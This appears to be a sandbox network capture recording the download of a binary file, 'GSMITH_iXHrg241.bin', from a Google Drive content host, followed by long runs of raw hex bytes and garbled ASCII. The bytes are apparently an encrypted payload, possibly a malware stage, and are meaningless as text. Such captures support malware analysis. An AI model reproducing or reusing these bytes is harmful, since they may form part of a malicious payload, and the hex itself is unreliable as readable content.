                                              2021-11-29 10:29:51 UTC2OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0bbf11090lmqcnv11oh7kschb18unor6/1638181725000/01591657853412424088/*/1eLHHSjrPsT_5LmA9stSGbcgvR_KlZTCv?e=download HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Cache-Control: no-cache
                                              Host: doc-0s-7o-docs.googleusercontent.com
                                              Connection: Keep-Alive
                                              2021-11-29 10:29:51 UTC2INHTTP/1.1 200 OK
                                              X-GUploader-UploadID: ADPycdslKpIbByGYj245cNhEeIod8oG1GfWFn0ibd-_nnzydFKWjku1CYfD0pCPSIPCXtGAaKnEdCkLsQyqUMN10Zoqq9vmW-A
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Credentials: false
                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                                              Access-Control-Allow-Methods: GET,OPTIONS
                                              Content-Type: application/octet-stream
                                              Content-Disposition: attachment;filename="GSMITH_iXHrg241.bin";filename*=UTF-8''GSMITH_iXHrg241.bin
                                              Content-Length: 221760
                                              Date: Mon, 29 Nov 2021 10:29:51 GMT
                                              Expires: Mon, 29 Nov 2021 10:29:51 GMT
                                              Cache-Control: private, max-age=0
                                              X-Goog-Hash: crc32c=ewFEkA==
                                              Server: UploadServer
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                              Connection: close
                                              2021-11-29 10:29:51 UTC6INData Raw: 29 a1 4a 10 ed ec f6 42 d3 e9 9d 03 13 b4 e8 54 0e 31 10 cd 17 f0 f4 fa 12 61 19 89 cd 79 ed ab dc 2a 2a 7f d4 1c de 24 67 44 42 5b 2c ee 39 df 98 ef 11 da 90 87 43 0c 6d 7e 7d 5d 65 96 2a b7 05 88 fc 80 5b 92 9a a9 87 85 01 74 a0 24 fe 06 30 95 17 ec f2 7b b9 25 6d 61 16 40 3a 0a f4 07 25 fa 19 c7 c8 67 a6 3d eb 82 a5 99 ee c3 9f 48 5e d6 4b 05 4d c3 01 2a 2d b8 52 ea 50 86 8b 59 f7 aa 7c a8 e9 03 d5 9d 19 8c 51 0c 1e aa be 67 d3 ba d6 b0 69 f1 53 5f b2 5c 70 3c 70 1d 7c 19 ea f3 72 f6 e3 95 22 25 3e 20 88 b8 89 45 1e a9 23 e7 8e d0 c9 7d d1 d2 b6 14 00 d6 4f 6a 58 30 03 ae 00 c5 e3 8b 08 89 3d a3 03 8c b1 96 1d 28 a9 dc 1e 15 b6 4b 88 03 a0 36 00 18 a0 36 86 da f7 81 4c 22 08 21 d1 e6 34 9e a4 8b db 03 2e 0a 96 cb d1 43 d5 12 2b fe 71 67 33 a3 e2 84 40
                                              Data Ascii: )JBT1ay**$gDB[,9Cm~}]e*[t$0{%ma@:%g=H^KM*-RPY|QgiS_\p<p|r"%> E#}OjX0=(K66L"!4.C+qg3@
                                              2021-11-29 10:29:51 UTC9INData Raw: b1 97 ea ad bb e4 3a d2 e2 27 20 e4 b2 12 e2 90 35 c1 8e d1 57 da 18 b1 03 34 6e 9a 6d 6f be df 62 b6 5f 55 10 ef 1d b5 7a be 03 c0 4b d9 e1 74 3f 92 15 ed 0b 5e 91 89 6b df da 16 92 f6 8a d9 8c 77 16 5e 7c ae 1c 7e 86 53 37 bf 1d 25 00 28 d5 cf c5 e5 6f 5b 20 8a e6 aa 69 a3 84 3e 9c f4 c5 40 ae 93 e1 54 52 78 12 f2 9c 9e 87 78 66 ca 71 fc a9 b4 59 85 89 56 2e b1 35 86 f3 e1 57 da ad 71 84 27 0a fe 0d 21 cb 45 c5 45 fd aa de fe f6 75 99 4a b7 d3 e8 f2 49 e9 a7 ed 0d ec 74 9d a3 73 ae 6f a3 28 a9 03 bd 02 d0 5d 6c 80 69 be f6 78 ac 92 c9 de b4 ff 38 77 9d c0 ba ce 02 0c 3a be e4 ba c4 ad d3 16 74 09 f5 3c cd 34 84 c8 19 35 ed af ab ef 2e 6c ad 2e c8 37 ac 72 a3 4e fa ee fa f0 99 7d 34 3a a2 5e 16 29 d9 d9 ee 19 62 02 0a 8e 28 45 3c f9 cc 2e ed 9e cc e0 8e
                                              Data Ascii: :' 5W4nmob_UzKt?^kw^|~S7%(o[ i>@TRxxfqYV.5Wq'!EEuJItso(]lix8w:t<45.l.7rN}4:^)b(E<.
                                              2021-11-29 10:29:51 UTC13INData Raw: 0b 9a 30 2c 6c f9 dd f8 d6 05 22 37 c8 99 84 d0 e8 a3 44 6c fe 7a f3 97 33 53 02 a7 2d 4a 1a 23 f0 22 6d 28 73 22 89 41 78 58 f1 9a 39 52 11 22 1d 43 09 e7 60 6e ad 00 f2 7c cc 39 b4 a4 4d c0 47 76 13 93 e2 8b ea 78 d8 44 1b 43 27 20 b2 1d 55 6f 45 50 78 9b f3 2a 3a d0 d6 33 b7 96 c3 e4 5d 9e a7 be b8 92 1f 37 71 b8 a8 56 10 a7 af da a4 07 76 18 01 51 5b 5d 94 ed 0a e5 96 bb b8 58 a9 f1 a7 0d 2e 8e c6 df 17 c6 ee ee ac f1 61 43 c1 99 0f c9 b6 3a 86 b5 7e 83 93 d9 0d 6c 94 8b 70 5b e6 02 63 05 27 1b a8 21 54 e5 7d 77 da 7c e0 e0 49 5b c3 ad a3 d7 1d dd 40 a7 39 83 e0 66 07 e8 b8 47 a9 c2 7b 51 de 8e 28 68 63 b3 eb f5 c6 87 1d 8e e9 e0 6e c3 3c 2c e6 84 7f 2f 23 d9 2a ac c6 d9 a1 d3 3a 11 07 35 a7 b1 60 fb d4 b3 3b fa 73 fb fe e4 92 47 e6 98 5c be 15 d1 5d
                                              Data Ascii: 0,l"7Dlz3S-J#"m(s"AxX9R"C`n|9MGvxDC' UoEPx*:3]7qVvQ[]X.aC:~lp[c'!T}w|I[@9fG{Q(hcn<,/#*:5`;sG\]
                                              2021-11-29 10:29:51 UTC17INData Raw: 01 4a 3c 19 c7 c2 b9 aa 15 dc 82 a5 93 c6 fb 9f 48 54 08 4b 2d f4 c1 01 2c 05 70 52 ea da ae 31 5b f9 b3 ee 82 e9 b7 d6 43 15 25 7d 68 8f 8b ea 09 a9 e2 de 7b 19 9e 32 3c f8 19 ec 5d 11 75 3a 51 9e d3 1a bb 9d e7 57 4d 0d 65 ce 25 cf 0a 4b 98 65 a0 54 b7 e7 76 f4 ff 92 14 0a fe 11 6a 58 36 40 c5 28 78 ad 8a 0d 98 2d df 3c ef b1 90 35 0f a9 dc 14 3d 08 4b 8a 04 b8 07 23 a5 a2 6e 83 cb dc a1 8c 20 08 27 f9 c1 1a e8 ad a3 85 23 2e 0c 85 e4 f9 fe d7 12 6d ef 5a 6f 61 a1 e2 80 68 0d f3 03 e8 9a a0 1e f0 cb 3b 28 ea 94 98 f8 ac 29 f5 ce 88 6e 2d 95 7f ed f6 49 9b fd 7b 44 f8 55 27 2d 8d ee 31 b9 40 08 a8 27 52 c3 ee 78 48 79 61 69 f2 b5 29 90 eb 3c d6 94 07 37 be c0 ee 96 36 e3 d6 e5 f7 b1 bb e1 91 75 85 34 33 7b 6b f4 16 da 0c 3b 0f 1a b1 a4 da a8 2e e6 73 ea
                                              Data Ascii: J<HTK-,pR1[C%}h{2<]u:QWMe%KeTvjX6@(x-<5=K#n '#.mZoah;()n-I{DU'-1@'RxHyai)<76u43{k;.s
                                              2021-11-29 10:29:51 UTC18INData Raw: 35 62 70 96 31 fa 22 2d c0 8b e7 b6 07 ac f5 49 b6 89 6b c6 b5 38 92 e0 0f 05 97 70 79 8c 7c ac 16 48 4f 11 ac b5 0e 1b 6d 29 d5 cf bb eb 6f f6 89 9d c7 8d 41 63 87 25 aa d9 ef 57 af 95 c9 69 52 78 05 e1 b3 b8 55 78 6c b4 6a d8 a9 b5 59 97 b7 34 1c b1 3f ef 9e 3c 6d d1 ab 66 ce 43 3d fe 07 2d f8 58 9f 56 fa ed ab fe f6 75 42 78 d9 9d e8 8c 4d ef b8 db 7a e3 e8 9d a9 75 9d ae b4 28 af 6d fe 42 c1 17 7c 80 eb be f6 78 61 d2 89 c9 c0 ee 57 25 99 e8 f5 c7 05 7e 28 e9 e6 bb ad 91 ab 16 7e 2b 19 2f 8d 2a ba b8 35 35 eb 07 ac ef bc 44 d4 2e cf 52 eb 30 b1 06 88 ff 95 a8 9d 55 44 8d b5 82 39 13 99 c3 c7 72 63 1a 14 5f 60 05 14 88 df 2a f0 a5 ae f4 9d c3 29 19 87 76 7f e5 07 d1 ac 30 1d ab 3d 6b 55 e3 14 33 03 28 7d e6 df f1 f9 88 55 d6 40 58 b7 1e 33 64 52 20 1d
                                              Data Ascii: 5bp1"-Ik8py|HOm)oAc%WiRxUxljY4?<mfC=-XVuBxMzu(mB|xaW%~(~+/*55D.R0UD9rc_`*)v0=kU3(}U@X3dR
                                              2021-11-29 10:29:51 UTC19INData Raw: 3e 89 85 01 79 70 c0 ee 92 21 1d d4 95 c9 87 ba ee 91 0b 8b 2e 33 7f 06 dc d4 d8 0c 03 20 d0 b1 aa d0 e8 a5 aa 74 ea 69 f8 97 22 57 07 ad d3 4a 36 2f f9 3f 1e 09 73 22 8d e3 67 53 8b 99 39 43 19 35 e3 42 3f e4 78 7c a9 00 e3 78 af c0 b5 88 40 d5 54 72 90 8b e6 94 fd 86 d9 68 03 68 22 19 5a e0 aa 90 d0 27 61 9b fd 2e 12 f4 76 3a bd bc df d4 5f 9e b5 bf b8 93 17 37 71 a9 11 54 3b bc a1 dd b3 f9 ca 3d 03 49 5f 5d 93 fb ee e4 ba b8 af 53 a9 f6 73 fa 2f a2 ca f4 15 ed d7 cf d9 f3 6d 45 c3 b1 8e c9 b6 31 ae c3 7c 83 73 f8 96 6c 9a 81 6f 51 9e 54 63 05 2a 33 33 21 4e ef 62 7c 56 23 e0 e0 48 79 58 ad ad dd 35 aa 4c ad 3f ab 74 66 07 e2 8a 3f ab c3 7d 79 45 8e 35 68 4b 96 e5 f5 cc af ad 84 e9 ea 49 86 3e 2c fa ac e4 2e 23 d3 02 8a fc d3 ab fb af 11 07 3f f0 b1 ec
                                              Data Ascii: >yp!.3 ti"WJ6/?s"gS9C5B?x|x@Trhh"Z'a.v:_7qT;=I_]Ss/mE1|sloQTc*33!Nb|V#HyX5L?tf?}yE5hKI>,.#?
                                              2021-11-29 10:29:51 UTC20INData Raw: c7 6e f8 87 76 73 f7 30 6d 7c 1a 00 aa 15 bc 4c 1d 13 37 25 02 53 e2 b0 8f d3 94 54 fe 2f 42 49 19 37 1e 51 36 25 89 45 1c 82 7a 5e 2c 6d ac 5a 85 91 a9 84 9b ff 75 73 d9 d5 03 b0 ea e8 13 0d 7d 93 25 2d 72 26 42 3a 96 f4 07 25 dd 19 c7 d9 71 b5 39 d3 02 a5 99 ee c3 8e 4c 45 28 4a 29 4a ca 09 b0 26 a4 41 ee d0 97 8f 45 07 b4 ea b7 ee d8 b1 50 38 3e 52 2f 23 8b ea 05 96 a9 eb d3 1f 9e 25 29 ca cf 51 73 14 65 1e 6c 8d d7 10 82 c7 f0 a9 4a 32 4a fe 8b c9 0a 5c 8d 53 76 eb 99 e2 67 f6 c6 81 10 00 c7 4b 70 a6 31 7f ee 2b f7 b4 99 0f 89 17 f3 9b 13 b0 ba 14 00 9a dc 1e 1f 5b 52 99 06 ab 26 0f 0e 5e 6f a9 d9 e0 9a 48 22 19 25 cf 18 1b c4 a5 a0 de 1b 55 f5 69 34 d9 54 03 1e 63 f7 ff f0 0c d5 1d 79 bf 3c d9 18 d2 b6 fe 99 f2 cd 28 2a c2 55 8b d0 73 27 e4 e4 91 14
                                              Data Ascii: nvs0m|L7%ST/BI7Q6%Ez^,mZus}%-r&B:%q9LE(J)J&AEP8>R/#%)QselJ2J\SvgKp1+[R&^oH"%Ui4Tcy<(*Us'
                                              2021-11-29 10:29:51 UTC22INData Raw: 63 49 8e 20 79 b5 97 c7 e6 ca 87 61 8c e9 ec 6e 6e 3c 2c e6 c3 9c 2f 23 d9 08 96 ca d9 a3 e4 ae ef 06 13 bf bc f6 a2 76 ac 2a de e8 f3 e1 fe 44 3f c8 93 5d 8d f0 c8 5d 06 34 3d 1e 25 64 90 bb 67 68 e9 4e a5 53 55 db ef 1d b5 58 70 39 c0 4d bc 47 74 39 b2 1f f6 07 5f b1 91 95 dc f6 7d ba e4 05 d9 80 18 eb 5e 7c a6 73 d9 86 11 a6 b5 0e 29 00 20 ca c3 3b e4 43 fd 8a 9d 8a a9 69 a3 81 87 b3 fc c9 57 a7 85 1f 40 7e 7a 14 fc b4 df 98 6a 92 bf 6e fe 82 b0 6b f0 5f e3 d1 9b 3f e9 b8 fa 67 d4 ab ad eb 6b 0a d4 07 27 fa 67 a3 ba fd c5 99 91 c2 7f 9f 57 b7 a8 e8 f2 49 e5 65 6c 62 a3 74 b8 81 42 86 23 ab 24 ad 44 12 02 d0 5d 79 ac 04 bc f2 7e c3 4e b2 de be f8 5a f5 e1 c0 b0 c4 2d 6c 00 be ee 93 ab ff d3 1c 77 af 0c e6 75 21 97 f6 3c 24 e9 ca bc ae a5 66 a4 3f ca 4a
                                              Data Ascii: cI yann<,/#v*D?]]4=%dghNSUXp9MGt9_}^|s) ;CiW@~zjnk_?gk'gWIelbtB#$D]y~NZ-lwu!<$f?J
                                              2021-11-29 10:29:51 UTC23INData Raw: a1 0a 96 cb d1 52 d1 0b 95 ff 5d 48 25 dd c7 86 40 2e 7d b4 f5 68 f3 12 ea de 2c 02 d3 51 82 06 ab 09 f7 9c b9 67 3c a1 5d 03 d9 5a 97 83 1f 2b 31 5f 2d 3e 89 14 33 a0 2b dd 56 26 74 d1 07 50 35 6c 0a a0 e3 b1 38 79 14 12 92 83 6e 5f 76 c0 e4 e2 04 1d d4 be c6 1d ac c9 bf 0b 8b 3e 25 81 06 f0 e1 c4 1f 39 27 c1 b5 b3 2e e9 89 e5 6b f9 6d f7 86 26 4d e3 ac ff 4e 1d 0e e2 2c 41 0e 62 26 95 1d 66 7f e1 89 2a 47 15 24 e7 5f db e5 54 7f 82 05 db 14 25 38 4a 80 59 01 58 7a 1a b3 4d 82 d8 86 d9 73 29 6c 22 9b 5d e0 aa bf 42 2e 70 b3 bb 2e 12 f2 56 13 bd bc d4 aa 7b 9e af bb 94 ac 69 14 71 a9 ba 4a 08 a4 d1 f8 b3 f9 73 ba b4 5f 61 71 bb b1 f4 e4 bc 94 aa 8e fa f1 bf f3 04 bc ba d7 15 ed 09 de ea e5 1f 60 c3 b1 90 47 01 26 9f cf 54 c8 95 f1 90 41 91 5c 5c 56 6a 5d
                                              Data Ascii: R]H%@.}h,Qg<]Z+1_->3+V&tP5l8yn_v>%9'.km&MN,Ab&f*G$_T%8JYXzMs)l"]B.p.V{iqJs_aq`G&TA\\Vj]
                                              2021-11-29 10:29:51 UTC24INData Raw: be ff 7f 01 9d c0 ba 45 0d 78 00 ba 39 b2 a8 fe d3 14 61 56 88 27 b3 3a 92 e0 33 1d e6 a6 bd a9 8d 48 ad 2e c5 d8 f0 72 a3 40 2b 02 97 a8 99 7f 21 f5 86 91 e5 0a d9 d9 eb 3c 6d 19 12 fb 59 61 3c f3 d5 aa f2 8d c9 f2 40 08 03 31 87 74 66 8d 33 a7 00 38 1d a1 11 93 5a e0 12 1d 05 0e 7d e0 ba 09 f1 88 5f fa f5 f5 b5 18 1b 1a 4d 5a 24 89 22 1f 82 7d 4c fa 62 83 58 94 b2 8d 83 85 0b f4 57 db fe 02 55 04 15 ec f2 79 a6 5e 1e 78 68 48 3a 0a f0 2f 2a f9 19 c1 e0 43 a6 3d e1 02 ad 99 ee c7 42 3b 5c d6 4b 07 52 e3 32 33 53 b0 52 ea d4 ae d1 5b f9 b3 ee 82 e9 b7 d6 d0 30 34 50 44 0e de e8 0f ba e1 f2 c0 1b 98 5b 24 d2 31 5a 30 1a 72 12 7c b6 d7 10 93 c5 88 5e 4a 1e 43 89 92 cc 0a 47 9f b0 89 b5 b7 f8 62 22 d9 84 ea 01 89 4d 4a fc 30 53 eb fe c4 b9 74 0a d6 04 d7 26
                                              Data Ascii: Ex9aV':3H.r@+!<mYa<@1tf38Z}_MZ$"}LbXWUy^xhH:/*C=B;\KR23SR[04PD[$1Z0r|^JCGb"MJ0St&
                                              2021-11-29 10:29:51 UTC26INData Raw: af 59 ba e6 a0 e8 3c b9 c4 e5 0e f2 18 38 d8 df 6b 54 c8 ab 42 da bd 2f b8 d0 67 83 84 ea 89 45 6a 80 43 5a 7b 56 72 10 f0 20 38 3e 7e fc 79 7d 47 38 ff c6 b6 72 74 a3 a1 cc 3e 82 50 a6 3f a1 68 73 18 c5 83 24 ab d3 66 66 7c 70 29 4e 41 e5 c9 f7 cc a9 8c 91 d3 f9 5d 86 2f 37 ff b5 1a 2e 0f d9 13 81 dc 0f b8 f0 be 0b 14 24 b8 aa f7 bb e0 4d 3b fe fa d3 ed ef ba 34 f5 9d 35 82 8f d1 57 15 29 80 34 27 73 90 a2 66 89 d2 9c b7 79 71 38 fc 0a dc 54 94 3b c6 54 e8 2c 6f 39 a9 0e f2 3e a1 b8 a5 6c cc c3 64 8d d6 16 c2 86 66 0d 41 64 52 1d 0b 88 13 bd b4 3f 34 01 28 df dc d6 fa 76 e5 96 8a e5 ab 76 8b 7b 24 80 e4 ed 44 ae 93 eb 43 43 73 12 e5 db c2 86 78 66 ad 56 e3 80 a6 48 83 b0 07 37 4f 3e c5 b5 e3 46 db 83 77 ea 6b 00 ed 00 3d f8 7e 8b 54 e6 da 84 00 f7 53 95
                                              Data Ascii: Y<8kTB/gEjCZ{Vr 8>~y}G8rt>P?hs$ff|p)NA]/7.$M;45W)4'sfyq8T;T,o9>ldfAdR?4(vv{$DCCsxfVH7O>Fwk=~TS
                                              2021-11-29 10:29:51 UTC27INData Raw: f6 58 51 c8 5a e9 89 dc 1d 97 9e 98 05 c1 b5 e7 71 cf c8 90 05 0f c7 5f 7c 49 21 7b fd 01 c5 a5 9b 04 98 17 21 90 e2 b3 87 12 00 bb dd 1e 1f 45 45 9b 0d b1 26 05 ce 76 7d 8a d8 e6 86 64 30 09 21 db ea 0b e7 bd 5d c8 2c 2c 1b 99 e3 c3 42 d5 18 66 ef 7e 5d e5 b0 ed 84 51 25 db 11 e3 b2 f4 0d fd dc 27 18 d3 58 4c 2e b9 2a e6 f3 94 4f 2e a4 75 f6 ca 5f 8c e3 68 fd 22 5a 36 22 8d ca 24 67 a2 ea a8 27 59 c7 14 78 39 70 1f a4 e4 a4 26 af 03 3f 89 8f 02 49 7b af f2 9d 21 17 ed 96 cf 87 ba e9 b1 05 0b 34 33 3f 98 dc d4 d8 0f 2c 2b bf ac a5 d0 e2 ca f8 72 ea 63 df c5 22 57 1b be c7 5a 22 3e e9 37 6d 5e 73 22 85 f0 75 54 8e bd 39 43 15 35 e3 42 05 a4 23 5e a9 00 e3 78 da c7 45 b7 17 ff c5 72 13 88 51 83 24 0b f2 68 19 69 31 0b 4b f2 bb 83 45 42 42 9b f3 2e 12 f4 d6
                                              Data Ascii: XQZq_|I!{!EE&v}d0!],,Bf~]Q%'XL.*O.u_h"Z6"$g'Yx9p&?I{!43?,+rc"WZ">7m^s"uT9C5B#^xErQ$hi1KEBB.
                                              2021-11-29 10:29:51 UTC28INData Raw: 78 66 ad 46 d4 ba b4 53 89 a3 73 b6 b1 3f e3 ab e4 7f c3 aa 66 e1 7a 0e 91 9f 27 eb 6f 98 43 ec c3 87 d6 77 7d 9f 5b ce 10 ef f2 43 ee ac cb 76 8b d7 9d a9 7f 9e af 9e 28 af 6d c5 31 d1 57 60 bf a8 83 f6 7e c2 eb 78 de be f3 7f 7f 9d c0 ba d2 d3 f5 2b be e4 ba b8 f9 c2 10 6a 09 a2 3d cd 34 8a 6d 30 35 ed a4 ae a4 b4 67 bb 3f c8 fa e9 79 b4 52 7a d6 95 a8 98 df 2f 86 a6 84 8a 0e cd cd f7 99 4e 1a 12 fc 62 48 2d fe c9 3d 66 9c c4 e1 8b 59 10 3c 90 5e de f4 00 b4 58 21 10 b7 85 97 48 f2 1e 0d b7 02 6c e0 b0 83 29 9a 5f fe 33 72 a3 18 1b 12 7a 14 16 90 56 63 90 7d 48 c9 7f 87 49 95 8b ae 0d 32 19 ae 49 47 8d 23 89 95 1d ff fa 6a b1 31 05 7b 15 40 3c 1d 79 00 25 fa 18 d4 c4 76 aa 2b fa 87 8d 88 ee c3 95 ea 4f da 58 0e 5c c8 15 3e 3a 35 7d ea d0 87 98 54 e8 b8
                                              Data Ascii: xfFSs?fz'oCw}[Cv(m1W`~x+j=4m05g?yRz/NbH-=fY<^X!Hl)_3rzVc}HI2IG#j1{@<y%v+OX\>:5}T
                                              2021-11-29 10:29:51 UTC29INData Raw: 7d a9 40 25 78 da c7 c6 ae 4f d7 5e 61 31 9c 6b bf f2 86 d8 7b 3a 77 3a 95 71 e0 aa 91 51 0a 70 9e ec 36 03 d7 c0 2d 95 aa d1 d4 55 8f aa a9 a9 b6 01 28 69 81 a8 5c 3b b6 be ff a2 dd 18 13 02 49 5a 4c b1 ea d7 8b 92 b8 af 59 b8 d4 a8 9c 06 a3 c4 fe 04 cf 14 a9 f3 f2 61 4f d2 93 fb e2 b7 30 a4 d2 78 95 84 f5 18 db fb ad 6e 51 60 4e 46 1a 66 be 18 21 54 ee 71 5c 47 06 ff c8 59 52 4e b2 e3 f5 23 ab 42 ad 4c 8e 7a 66 0d f1 b6 2e 8d d3 5c 16 67 8f 28 68 58 b1 fa d2 e4 b8 87 8e e3 c2 11 84 3e 2a c8 82 e6 2f 25 bc 7a 8a c6 d3 b8 d3 a6 00 01 2e 90 d4 d6 a5 d4 b9 e4 de f9 dd d2 e9 ab 18 8b cf 5a 96 84 0d 5a 0c ee 86 06 3e b6 85 b4 77 48 f9 47 9e 62 7d 3e e7 0e 9a 58 ae 3b c0 41 0d 3f 73 13 be 3f ac 77 5f b9 8b 6b dd da db 92 e0 05 f8 86 77 16 8b 7c ac 1c 36 86 11
                                              Data Ascii: }@%xO^a1k{:w:qQp6-U(i\;IZLYaO0xnQ`NFf!Tq\GYRN#BLzf.\g(hX>*/%z.ZZ>wHGb}>X;A?s?w_kw|6
                                              2021-11-29 10:29:51 UTC31INData Raw: 35 15 e1 f9 24 d6 17 d6 c2 71 3c 15 fa 82 a5 93 e5 dc 89 5b 51 d6 5a 0a 52 c9 ff 2b 01 b5 40 ec c1 81 a3 43 f8 b5 cc b9 e2 a4 d3 50 29 3b 4f 49 2d 8a c6 2c ab c2 ee 5a 33 8f 34 2d d9 e1 42 5f 11 68 3a 62 9e d3 1a bb f7 e6 57 41 6a 5b e6 98 d6 19 4a 96 44 9b e5 b5 f6 7f c6 26 93 38 0c c9 5f e7 73 30 53 ea 13 c2 b4 99 04 89 17 f8 9c fc 4f 97 31 3b b8 d5 08 3d 44 4a 8a 08 27 08 0b 18 a1 7d 80 c5 e5 9a 43 22 19 2e ce f1 e4 e9 8b 84 ca 29 36 90 be da d1 43 df 01 6f e1 69 54 3c a3 f3 89 58 d4 f2 2f f7 b0 8d 21 f1 cd 22 6d 82 54 9a f2 26 b4 e4 e2 9a 74 34 bc 66 f3 d9 4b 92 f3 7d d5 30 79 2d 36 96 08 a3 9d 86 de b8 34 57 d4 01 75 37 71 f0 a1 de bb 32 8d 03 a4 a1 94 01 58 7d cb f1 93 32 12 d4 ab c1 9b 44 e0 bd 07 9a 38 25 ef 3e be 2a 27 f3 20 34 df b1 b5 df f7 b7
                                              Data Ascii: 5$q<[QZR+@CP);OI-,Z34-B_h:bWAj[JD&8_s0SO1;=DJ'}C".)6CoiT<X/!"mT&t4fK}0y-64Wu7q2X}2D8%>*' 4
                                              2021-11-29 10:29:51 UTC32INData Raw: 3e e4 06 4d 71 ba 31 c2 4e 99 ae 6b 33 8b 3f f1 06 5f b0 95 95 dc f6 6a 95 cc 1f c4 8b 77 1f 48 82 ad 30 25 91 1c ac b6 08 2c fe 29 f9 cd ee e0 57 88 72 75 0b a7 62 88 8f 27 a9 bb 54 48 a2 bd e3 57 59 7d 26 ba a3 01 d3 7d 26 b6 73 45 bf 9f 40 b3 a3 1c 13 b1 3f e9 fb e1 57 c1 bd 6a c0 44 0a f6 10 d9 ea 49 89 5d f1 c5 9b e6 08 7e b3 50 a6 aa e8 f2 47 9c f3 de 62 a9 7f 84 a5 75 8e 35 5f 29 83 6e fa 0e d0 5f 73 56 25 90 f4 55 c1 e8 06 d9 bc 96 1b 24 9d ca 9a c5 05 78 13 8e e6 bb fe fe d3 16 3a 21 bb 2f db 3e b9 ad 37 3d f4 5b bc 83 a1 75 87 34 c3 58 f0 65 5d 45 da eb 8d a4 99 75 24 73 b4 a4 96 05 b6 94 ee 14 6b 02 21 d6 66 6f 27 ff df 22 e2 73 c8 da 91 c7 13 30 af 38 78 f4 0a 93 9c 29 11 a1 1d ad a9 e2 3e 19 3a 26 7d e8 ab 77 f8 a4 5d d5 2a 71 06 02 31 18 52
                                              Data Ascii: >Mq1Nk3?_jwH0%,)Wrub'THWY}&}&sE@?WjDI]~PGbu5_)n_sV%U$x:!/>7=[u4Xe]Eu$sk!fo'"s08x)>:&}w]*q1R
                                              2021-11-29 10:29:51 UTC33INData Raw: af 03 3f 89 8f 2a 53 5f ee ec 9c 27 6e 82 bb ce 8d c0 fd 96 dd 9c ee 24 a9 8a f7 d4 d8 0d 30 2e c6 aa 38 d9 ff a7 52 ef e3 70 f4 23 be 51 0b a4 c9 4c 1e 39 f8 3f 4f 07 7a ac 34 fb bd 56 8e bd 39 43 15 35 e3 42 55 a4 23 55 38 00 e3 72 6e 5b bc 81 c0 60 43 a8 16 a2 e6 95 f2 86 84 dc 85 61 08 18 5a e0 b9 a0 47 2e e8 9b f3 2e 5a f4 d6 22 95 2b d0 d4 55 9c c0 27 b8 92 1d 3a 78 27 09 7d c4 bc af dd 82 f2 5f 15 00 49 56 2e c4 fa f4 ee c0 91 38 53 a9 fc bc 9c b7 a2 c4 fe 19 e5 83 71 f9 0c 61 45 c3 80 9f e1 97 33 ae c5 0f d4 94 f1 9c 16 8d 88 e1 e6 bc 55 ed b2 f0 24 e9 36 82 62 49 7d 56 22 ea e6 5e 64 c4 ab b4 d4 bb 1d f6 3b 36 bd 7d 7e 0e 6c 27 17 bd c3 7d 73 43 96 21 ec fc 40 e3 7b 7b 1b 1a 86 ff ec 5f 8f b0 9b 36 a4 6a 98 0b c5 03 8a cc df 81 e5 a3 39 14 